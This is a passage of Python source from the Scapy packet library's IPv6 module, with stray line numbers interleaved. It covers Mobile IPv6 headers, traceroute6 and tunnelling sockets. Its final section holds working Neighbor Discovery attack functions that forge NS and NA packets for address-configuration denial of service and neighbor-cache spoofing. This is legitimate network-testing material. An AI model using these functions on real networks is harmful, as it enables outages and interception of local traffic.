        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # Alignment requirement: none
    x = 0
    y = 0

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return the class to use for the raw option ``_pkt``.

        The first octet of ``_pkt`` (the option type) is looked up in
        ``moboptcls``; this class is returned when there is no data or no
        registered class for that type.
        """
        if not _pkt:
            return cls
        return moboptcls.get(orb(_pkt[0]), cls)
3110
3111
# Mobility option classes, indexed by option type (0 to 16). Used by
# MIP6OptUnknown.dispatch_hook() to select the dissection class.
moboptcls = dict(enumerate((
    Pad1,                       # 0
    PadN,                       # 1
    MIP6OptBRAdvice,            # 2
    MIP6OptAltCoA,              # 3
    MIP6OptNonceIndices,        # 4
    MIP6OptBindingAuthData,     # 5
    MIP6OptMobNetPrefix,        # 6
    MIP6OptLLAddr,              # 7
    MIP6OptMNID,                # 8
    MIP6OptMsgAuth,             # 9
    MIP6OptReplayProtection,    # 10
    MIP6OptCGAParamsReq,        # 11
    MIP6OptCGAParams,           # 12
    MIP6OptSignature,           # 13
    MIP6OptHomeKeygenToken,     # 14
    MIP6OptCareOfTestInit,      # 15
    MIP6OptCareOfTest,          # 16
)))
3129
3130
3131# Main Mobile IPv6 Classes
3132
# Short names of the Mobility Header message types, indexed by MH type
# value (0 to 10).
mhtypes = dict(enumerate([
    'BRR',
    'HoTI',
    'CoTI',
    'HoT',
    'CoT',
    'BU',
    'BA',
    'BE',
    'Fast BU',
    'Fast BA',
    'Fast NA',
]))
3144
3145# From http://www.iana.org/assignments/mobility-parameters
# Binding Acknowledgement status codes: values below 128 report success,
# the contiguous 128..150 range reports the various failure reasons.
bastatus = {
    0: 'Binding Update accepted',
    1: 'Accepted but prefix discovery necessary',
}
bastatus.update(enumerate([
    'Reason unspecified',
    'Administratively prohibited',
    'Insufficient resources',
    'Home registration not supported',
    'Not home subnet',
    'Not home agent for this mobile node',
    'Duplicate Address Detection failed',
    'Sequence number out of window',
    'Expired home nonce index',
    'Expired care-of nonce index',
    'Expired nonces',
    'Registration type change disallowed',
    'Mobile Router Operation not permitted',
    'Invalid Prefix',
    'Not Authorized for Prefix',
    'Forwarding Setup failed (prefixes missing)',
    'MIPV6-ID-MISMATCH',
    'MIPV6-MESG-ID-REQD',
    'MIPV6-AUTH-FAIL',
    'Permanent home keygen token unavailable',
    'CGA and signature verification failed',
    'Permanent home keygen token exists',
    'Non-null home nonce index expected',
], start=128))
3171
3172
class _MobilityHeader(Packet):
    """Common base of the Mobility Header messages.

    It only provides the post-build step filling the header length and the
    checksum when they were not explicitly set.
    """
    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """Append the payload, then patch the length and checksum fields.

        :param p: the built header
        :param pay: the built payload
        :returns: the final bytes of the message
        """
        data = p + pay

        if self.len is None:
            # Header length is counted in 8-octet units, excluding the
            # first 8 octets; it lives in the second octet.
            units = (len(data) - 8) // 8
            data = data[:1] + struct.pack("B", units) + data[2:]

        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, data)

        # The checksum occupies octets 4 and 5
        return data[:4] + struct.pack("!H", cksum) + data[6:]
3189
3190
class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """Generic Mobility Header message with an opaque message body.

    The fixed part (nh, len, mhtype, res, cksum) is 6 octets long and the
    whole message is 8 * (len + 1) octets long, which leaves
    8 * len + 2 octets for ``msg``.
    """
    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", None, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        # 8 * (len + 1) octets in total, minus the 6 octets above. The
        # former "8 * len - 6" gave a negative size for len == 0, i.e. for
        # the message built with the default 2-octet msg.
        StrLenField("msg", b"\x00" * 2,
                    length_from=lambda pkt: 8 * pkt.len + 2),
    ]
3200
3201
class MIP6MH_BRR(_MobilityHeader):
    """Binding Refresh Request message (MH type 0)."""
    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 8,
                      length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared by BRR, BU and BA messages.

        Hack: the three classes return the very same value so that a BA can
        be matched with a BU, and a BU with a BRR. --arno
        """
        return b"\x00\x08\x09"
3220
3221
class MIP6MH_HoTI(_MobilityHeader):
    """Home Test Init message (MH type 1)."""
    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 16,
                      length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Hash on the cookie, which is echoed back in the matching reply."""
        return bytes_encode(self.cookie)
3238
3239
class MIP6MH_CoTI(MIP6MH_HoTI):
    """Care-of Test Init message: same layout as HoTI, with MH type 2."""
    name = "IPv6 Mobility Header - Care-of Test Init"
    mhtype = 2

    def hashret(self):
        """Hash on the cookie, like the parent class does."""
        return bytes_encode(self.cookie)
3246
3247
class MIP6MH_HoT(_MobilityHeader):
    """Home Test message (MH type 3), sent in response to a HoTI."""
    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Hash on the cookie copied from the request."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if ``other`` is a HoTI carrying the same cookie."""
        matches = (isinstance(other, MIP6MH_HoTI) and
                   self.cookie == other.cookie)
        return 1 if matches else 0
3271
3272
class MIP6MH_CoT(MIP6MH_HoT):
    """Care-of Test message: same layout as HoT, with MH type 4."""
    name = "IPv6 Mobility Header - Care-of Test"
    mhtype = 4

    def hashret(self):
        """Hash on the cookie copied from the request."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if ``other`` is a CoTI carrying the same cookie."""
        matches = (isinstance(other, MIP6MH_CoTI) and
                   self.cookie == other.cookie)
        return 1 if matches else 0
3285
3286
class LifetimeField(ShortField):
    """Short field whose value is a lifetime expressed in 4-second units."""

    def i2repr(self, pkt, x):
        """Display the lifetime converted to seconds."""
        seconds = 4 * x
        return "%d sec" % seconds
3290
3291
class MIP6MH_BU(_MobilityHeader):
    """Binding Update message (MH type 5)."""
    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        XShortField("seq", None),  # TODO: ShortNonceField
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        LifetimeField("mhtime", 3),  # unit == 4 seconds
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared with BRR and BA messages.

        Hack: see comment in MIP6MH_BRR.hashret()
        """
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if ``other`` is a Binding Refresh Request."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0
3315
3316
class MIP6MH_BA(_MobilityHeader):
    """Binding Acknowledgement message (MH type 6)."""
    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 6, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ByteEnumField("status", 0, bastatus),
        FlagsField("flags", "K", 3, "PRK"),
        XBitField("res2", None, 5),
        XShortField("seq", None),  # TODO: ShortNonceField
        XShortField("mhtime", 0),  # unit == 4 seconds
        _PhantomAutoPadField("autopad", 1),  # autopad activated by default
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant hash shared with BRR and BU messages.

        Hack: see comment in MIP6MH_BRR.hashret()
        """
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if this BA acknowledges the Binding Update ``other``.

        ``other`` must be a BU requesting an acknowledgement (A flag set)
        and both messages must carry the same sequence number.
        """
        # The BU flag names ("PRMKLHA") are listed from the least
        # significant bit, which makes 'A' (Acknowledge) bit 6. The mask
        # used to be 0x1, i.e. the 'P' flag, so that a BU built with the
        # default "KHA" flags was never matched.
        ack_requested = 0x40
        if (isinstance(other, MIP6MH_BU) and
                other.mhtype == 5 and
                self.mhtype == 6 and
                other.flags & ack_requested and
                self.seq == other.seq):
            return 1
        return 0
3345
3346
# Status codes carried by the Binding Error message
_bestatus = dict([
    (1, 'Unknown binding for Home Address destination option'),
    (2, 'Unrecognized MH Type value'),
])
3349
3350# TODO: match Binding Error to its stimulus
3351
3352
class MIP6MH_BE(_MobilityHeader):
    """Binding Error message (MH type 7)."""
    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}
3366
3367
# Mobility Header message classes, indexed by MH type value (0 to 7)
_mip6_mhtype2cls = dict(enumerate((
    MIP6MH_BRR,     # 0
    MIP6MH_HoTI,    # 1
    MIP6MH_CoTI,    # 2
    MIP6MH_HoT,     # 3
    MIP6MH_CoT,     # 4
    MIP6MH_BU,      # 5
    MIP6MH_BA,      # 6
    MIP6MH_BE,      # 7
)))
3376
3377
3378#############################################################################
3379#############################################################################
3380# Traceroute6 #
3381#############################################################################
3382#############################################################################
3383
class AS_resolver6(AS_resolver_riswhois):
    """RIS whois AS resolver aware of IPv4 addresses embedded in IPv6."""

    def _resolve_one(self, ip):
        """
        Resolve the AS of the IPv6 address ``ip``.

        For 6to4 and Teredo addresses, the Whois resolution is performed
        on the embedded IPv4 address. Otherwise, the native IPv6 address
        is used. The returned tuple is (ip, asn, desc), where asn is
        converted to an integer when it has the "AS<number>" form.
        """

        if in6_isaddr6to4(ip):
            # 6to4: the IPv4 address is stored in octets 2 to 5
            packed = inet_pton(socket.AF_INET6, ip)
            lookup = inet_ntop(socket.AF_INET, packed[2:6])
        elif in6_isaddrTeredo(ip):
            # Teredo: use the mapped address
            lookup = teredoAddrExtractInfo(ip)[2]
        else:
            lookup = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, lookup)

        if asn.startswith("AS"):
            number = asn[2:]
            try:
                asn = int(number)
            except ValueError:
                # Not a plain number: keep the string returned by whois
                pass

        return ip, asn, desc
3409
3410
class TracerouteResult6(TracerouteResult):
    """IPv6 flavour of TracerouteResult."""
    __slots__ = []

    def show(self):
        """Display the results as a table, one column per destination."""
        probe_fmt = "%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"  # TODO: ICMPv6 ! # noqa: E501
        reply_fmt = ("%-42s,IPv6.src% {TCP:%TCP.flags%}" +
                     "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" +  # noqa: E501
                     "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" +  # noqa: E501
                     "{ICMPv6EchoReply:%ir,type%}")
        return self.make_table(lambda s, r: (s.sprintf(probe_fmt),
                                             s.hlim,
                                             r.sprintf(reply_fmt)))

    def get_trace(self):
        """Return the traces as {destination: {hlim: (source, final)}}.

        ``final`` is False when the answer is an ICMPv6 error (Time
        Exceeded, Destination Unreachable, Packet Too Big or Parameter
        Problem). For each destination, hops located after the first final
        answer are removed.
        """
        trace = {}

        for s, r in self.res:
            if IPv6 not in s:
                continue
            hops = trace.setdefault(s[IPv6].dst, {})

            is_error = (ICMPv6TimeExceeded in r or
                        ICMPv6DestUnreach in r or
                        ICMPv6PacketTooBig in r or
                        ICMPv6ParamProblem in r)

            hops[s[IPv6].hlim] = r[IPv6].src, not is_error

        for hops in trace.values():
            try:
                first_final = min(hlim for hlim, hop in hops.items()
                                  if hop[1])
            except ValueError:
                # The destination never answered: keep every hop
                continue
            for hlim in list(hops):  # use list(): hops is modified below
                if hlim > first_final:
                    del hops[hlim]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Graph the traces using an IPv6 aware AS resolver by default.

        Arguments are passed to TracerouteResult.graph(), whose result is
        now returned instead of being silently dropped.
        """
        return TracerouteResult.graph(self, ASres=ASres, **kargs)
3452
3453
@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6

    One probe is sent for each hop limit between minttl and maxttl. Unless
    a specific layer 4 is given with l4, TCP probes are sent from sport to
    dport. Remaining keyword arguments are passed to sr().

    :returns: a (TracerouteResult6, unanswered packets) tuple
    """
    if verbose is None:
        verbose = conf.verb

    probes = IPv6(dst=target, hlim=(minttl, maxttl))
    if l4 is not None:
        a, b = sr(probes / l4,
                  timeout=timeout, verbose=verbose, **kargs)
    else:
        probes = probes / TCP(seq=RandInt(), sport=sport, dport=dport)
        a, b = sr(probes,
                  timeout=timeout, filter="icmp6 or tcp",
                  verbose=verbose, **kargs)

    a = TracerouteResult6(a.res)

    if verbose:
        a.show()

    return a, b
3476
3477#############################################################################
3478#############################################################################
3479# Sockets #
3480#############################################################################
3481#############################################################################
3482
3483
if not WINDOWS:
    from scapy.supersocket import L3RawSocket

    class L3RawSocket6(L3RawSocket):
        """Layer 3 raw socket for IPv6 (not available on Windows)."""

        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0):  # noqa: E501
            # Emission goes through a raw IPv6 socket.
            # NOTE: if fragmentation is needed, it will be done by the
            # kernel (RFC 2292)
            self.outs = socket.socket(socket.AF_INET6,
                                      socket.SOCK_RAW,
                                      socket.IPPROTO_RAW)
            # Reception goes through a packet socket bound to the protocol
            # given by type.
            self.ins = socket.socket(socket.AF_PACKET,
                                     socket.SOCK_RAW,
                                     socket.htons(type))
            self.iface = iface
3493
3494
def IPv6inIP(dst='203.178.135.36', src=None):
    """Configure the IPv6-in-IPv4 socket class and return it.

    The tunnel endpoints are stored on the _IPv6inIP class. When
    conf.L3socket is not already _IPv6inIP, it is recorded as the worker
    socket class; otherwise conf.L3socket is deleted.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP
3503
3504
class _IPv6inIP(SuperSocket):
    """Socket tunnelling IPv6 packets inside IPv4 through a worker socket.

    The tunnel endpoints (dst, src) and the class of the worker socket
    (cls) are class attributes, configured by IPv6inIP() or set().
    """
    dst = '127.0.0.1'
    src = None
    cls = None

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args):  # noqa: E501
        SuperSocket.__init__(self, family, type, proto)
        # Extra arguments are handed over to the worker socket
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the tunnel endpoints (shared by all instances)."""
        _IPv6inIP.src = src
        _IPv6inIP.dst = dst

    def nonblock_recv(self):
        """Non-blocking receive through the worker socket."""
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        """Receive through the worker socket."""
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """Return the inner IPv6 packet when p comes from the tunnel.

        Anything else (including None) is returned unchanged.
        """
        # TODO: verify checksum
        from_tunnel = (isinstance(p, IP) and
                       p.src == self.dst and
                       p.proto == socket.IPPROTO_IPV6 and
                       isinstance(p.payload, IPv6))
        if from_tunnel:
            return p.payload
        return p

    def send(self, x):
        """Send x encapsulated in an IPv4 packet to the tunnel endpoint."""
        outer = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(outer / x)
3538
3539
3540#############################################################################
3541#############################################################################
3542# Neighbor Discovery Protocol Attacks #
3543#############################################################################
3544#############################################################################
3545
def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    reply_callback: called as reply_callback(req, reply_mac, iface) for
        each received DAD NS passing the filters.

    iface: interface to sniff on; conf.iface is used if not provided.

    mac_src_filter: only consider NS received from that MAC address.

    tgt_filter: only consider NS for that target address. It can be given
        in printable form (e.g. "2001:db8::1") or in packed (16 bytes)
        form.

    reply_mac: source MAC address passed to the callback; the address of
        the interface is used if not provided.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # Dissected MAC addresses are lowercase: normalize the filter so that
    # an uppercase address still matches.
    if isinstance(mac_src_filter, str):
        mac_src_filter = mac_src_filter.lower()

    # is_request() compares packed addresses: a filter given in printable
    # form would otherwise never match anything.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)
3596
3597
def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756. Incoming NS messages sent from the unspecified address are
    listened for, and a NS is sent in reply for the same target address,
    so that the peer believes another node is also performing DAD for
    that address.

    The fake NS sent to create the DoS uses:
     - as target address: the target address found in the received NS.
     - as IPv6 source address: the unspecified address (::).
     - as IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in the received NS.
     - as source mac address: the address of the interface (or reply_mac,
       see below).
     - as destination mac address: the multicast mac address derived from
       the solicited node multicast address used as IPv6 destination.

    The behavior can be tuned with the following arguments:

    iface: the interface (e.g. "eth0") on which the DoS is launched.
           conf.iface is used if None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source trigger replies,
         which limits the effects of the DoS to a single target. With the
         default value (None), the DoS is not limited to a specific mac
         address.

    tgt_filter: same as the previous one, but for the target IPv6 address
         of the received NS. A fake reply is sent only if the target
         address in the NS message (not the IPv6 destination address)
         matches that address, i.e. the emitter will be a target of the
         DoS.

    reply_mac: a specific source mac address for the reply, to be used
         instead of the mac address of the interface.
    """

    def send_fake_ns(req, reply_mac, iface):
        """
        Answer the NS req by sending a similar NS
        """

        requester_mac = req[Ether].src
        snma = req[IPv6].dst
        target = req[ICMPv6ND_NS].tgt

        fake_ns = Ether(src=reply_mac)
        fake_ns = fake_ns / IPv6(src="::", dst=snma)
        fake_ns = fake_ns / ICMPv6ND_NS(tgt=target)
        sendp(fake_ns, iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (target, requester_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(send_fake_ns, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3652
3653
def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. Incoming NS messages *sent from the unspecified address* are
    listened for, and a NA is sent in reply for the target address, so
    that the peer believes the address is already in use.

    The fake NA sent to create the DoS uses:
     - as target address: the target address found in the received NS.
     - as IPv6 source address: the target address found in the received NS.
     - as IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in the received NS.
     - as source mac address: the address of the interface (or reply_mac,
       see below).
     - as destination mac address: the multicast mac address derived from
       the solicited node multicast address used as IPv6 destination.
     - a Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    The behavior can be tuned with the following arguments:

    iface: the interface (e.g. "eth0") on which the DoS is launched.
          conf.iface is used if None is provided.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source trigger replies,
         which limits the effects of the DoS to a single target. With the
         default value (None), the DoS is not limited to a specific mac
         address.

    tgt_filter: same as the previous one, but for the target IPv6 address
         of the received NS. A fake reply is sent only if the target
         address in the NS message (not the IPv6 destination address)
         matches that address, i.e. the emitter will be a target of the
         DoS.

    reply_mac: a specific source mac address for the reply, to be used
         instead of the mac address of the interface. This address is
         also used in the Target Link-Layer Address option.
    """

    def send_fake_na(req, reply_mac, iface):
        """
        Answer the NS req with a NA
        """

        requester_mac = req[Ether].src
        snma = req[IPv6].dst
        target = req[ICMPv6ND_NS].tgt

        fake_na = Ether(src=reply_mac) / IPv6(src=target, dst=snma)
        fake_na = fake_na / ICMPv6ND_NA(tgt=target, S=0, R=0, O=1)  # noqa: E741
        fake_na = fake_na / ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
        sendp(fake_na, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (target, requester_mac))  # noqa: E501

    _NDP_Attack_DAD_DoS(send_fake_na, iface, mac_src_filter,
                        tgt_filter, reply_mac)
3713
3714
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function sends
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination mac address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be given in printable form (e.g. "2001:db8::1") or in packed
         (16 bytes) form.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        pkt = req[IPv6]
        src = pkt.src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    if not iface:
        iface = conf.iface

    # Dissected MAC addresses are lowercase: normalize the filter so that
    # an uppercase address still matches.
    if isinstance(mac_src_filter, str):
        mac_src_filter = mac_src_filter.lower()

    # is_request() compares packed addresses: a filter given in printable
    # form would otherwise never match anything.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)
3851
3852
def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Send forged Neighbor Solicitation messages to a victim so that it
    creates a new entry in its neighbor cache, or updates an existing one.
    Section 7.2.3 of RFC 4861 states that a node SHOULD create or update
    that entry (unless it is currently performing DAD for the target of
    the NS); the reachability state of the entry is then set to STALE.

    What ends up in the victim's cache is driven by two values: the
    link-layer address carried in the Source Link-Layer Address option of
    the NS, and the IPv6 source address of the packet.

    Contrary to some other NDP_Attack_* functions, nothing is sniffed
    here: there is no stimulus/response logic. The very same NS is simply
    emitted in loop, once per second by default.

    The packet can be tuned with the following arguments:

    src_lladdr: MAC address placed in the Source Link-Layer Address option
                of the NS, i.e. the one the peer should associate with the
                IPv6 source address of the packet in its neighbor cache.
                When None, the MAC address of the interface is used.

    src: IPv6 source address of the packet. When None, it is not set
         explicitly and an address associated with the emitting interface
         will be used (based on the destination address of the packet).

    target: target address of the NS; a dummy address (2001:db8::1) is
            used by default. Unless 'dst' is provided, the packet is sent
            to the solicited-node multicast address derived from this
            value. Consider providing an explicit destination if the
            target is not an address of the victim.

    dst: IPv6 destination address of the NS. When not provided, the
         solicited-node multicast address associated with 'target' is
         used. The victim is not expected to check the destination of the
         packet, so a multicast address such as ff02::1 should work to
